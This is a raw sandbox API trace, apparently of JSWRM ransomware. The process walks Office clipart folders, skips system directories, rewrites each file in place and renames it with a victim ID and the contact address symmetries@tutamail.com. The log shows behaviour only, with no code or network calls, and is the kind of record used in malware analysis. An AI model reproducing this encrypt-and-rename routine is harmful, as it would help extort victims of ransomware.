[0079.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0079.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0079.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0079.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0079.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0079.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099171.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0079.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.844] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe392, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099172.WMF", cAlternateFileName="")) returned 1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2=".") returned 1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="..") returned 1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="...") returned 1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="windows") returned -1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="recovery") returned -1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="perflogs") returned -1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="documents and settings") returned 1 [0079.844] lstrcmpiW (lpString1="J0099172.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.845] lstrcmpiW (lpString1="J0099172.WMF", lpString2="system volume information") returned -1 [0079.845] lstrcmpiW (lpString1="J0099172.WMF", lpString2="msocache") returned -1 [0079.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0079.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099172.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099172.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099172.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0079.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099172.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099172.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099172.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.845] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=58258) returned 1 [0079.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe390) returned 0x24d210 [0079.845] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xe390, lpOverlapped=0x0) returned 1 [0079.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.851] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xe390, lpOverlapped=0x0) returned 1 [0079.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.852] CloseHandle (hObject=0x314) returned 1 [0079.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0079.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0079.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.853] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9114, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099173.WMF", cAlternateFileName="")) returned 1 [0079.853] lstrcmpiW (lpString1="J0099173.WMF", lpString2=".") returned 1 [0079.853] lstrcmpiW (lpString1="J0099173.WMF", lpString2="..") returned 1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="...") returned 1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="windows") returned -1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="recovery") returned -1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="perflogs") returned -1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="documents and settings") returned 1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="system volume information") returned -1 [0079.854] lstrcmpiW (lpString1="J0099173.WMF", lpString2="msocache") returned -1 [0079.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099173.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099173.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099173.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099173.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099173.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099173.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.854] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37140) returned 1 [0079.854] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9110) returned 0x24d210 [0079.855] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9110, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9110, lpOverlapped=0x0) returned 1 [0079.859] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.860] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9110, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9110, lpOverlapped=0x0) returned 1 [0079.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.861] CloseHandle (hObject=0x314) returned 1 [0079.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0079.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0079.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0079.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0079.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0079.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0079.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.865] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe081920, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe081920, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe081920, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1846, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099174.WMF", cAlternateFileName="")) returned 1 [0079.865] lstrcmpiW (lpString1="J0099174.WMF", lpString2=".") returned 1 [0079.865] lstrcmpiW (lpString1="J0099174.WMF", lpString2="..") returned 1 [0079.865] lstrcmpiW (lpString1="J0099174.WMF", lpString2="...") returned 1 [0079.865] lstrcmpiW (lpString1="J0099174.WMF", lpString2="windows") returned -1 [0079.866] lstrcmpiW (lpString1="J0099174.WMF", lpString2="recovery") returned -1 [0079.866] lstrcmpiW (lpString1="J0099174.WMF", lpString2="perflogs") returned -1 [0079.866] lstrcmpiW (lpString1="J0099174.WMF", lpString2="documents and settings") returned 1 [0079.866] lstrcmpiW (lpString1="J0099174.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.866] lstrcmpiW (lpString1="J0099174.WMF", lpString2="system volume information") returned -1 [0079.866] lstrcmpiW (lpString1="J0099174.WMF", lpString2="msocache") returned -1 [0079.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099174.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099174.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099174.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099174.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099174.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099174.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.866] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6214) returned 1 [0079.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1840) returned 0x205850 [0079.867] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1840, lpOverlapped=0x0) returned 1 [0079.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.869] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1840, lpOverlapped=0x0) returned 1 [0079.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.869] CloseHandle (hObject=0x314) returned 1 [0079.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0079.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0079.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0079.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.869] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0079.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.870] FindNextFileW (in: 